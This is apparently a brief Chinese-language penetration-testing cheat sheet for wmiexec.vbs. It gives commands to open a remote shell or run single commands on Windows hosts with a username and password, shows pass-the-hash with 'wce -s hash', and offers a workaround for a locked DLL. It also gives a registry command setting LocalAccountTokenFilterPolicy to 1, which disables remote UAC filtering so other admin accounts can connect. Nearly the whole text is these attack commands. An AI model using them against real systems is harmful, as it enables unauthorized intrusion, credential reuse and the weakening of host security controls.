wmiexec.vbs
  1. 1、半交互模式
  2. cscript.exe //nologo wmiexec.vbs /shell ip username password
  3. 2、单命令执行
  4. cscript.exe wmiexec.vbs /cmd ip username password "command"
  5. 3wce_hash注入
  6. 如果抓取的LM hashAAD3开头的,或者是No Password之类的,就用320代替LM hash
  7. wce -s hash
  8. cscript.exe //nologo wmiexec.vbs /shell ip

wmiexec.vbs - 图1 wmi只是创建进程,没办法去判断一个进程是否执行完成(比如ping),这样就导致wmi.dll删除不成,下一次又是被占用,这时候修改一下vbs里面的名字就好:Const FileName = "wmi1.dll",也可以加入-persist参数(后台运行)

另外有一个uac问题 非域用户登陆到win08和2012中,只有administrator可以登陆成功,其他管理员账号会出现WMIEXEC ERROR: Access is denied 需要在win08或者2012上面执行,然后才可以连接:

  1. cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

wmiexec.vbs - 图2

想更详细了解的可以看看:https://www.91ri.org/12908.html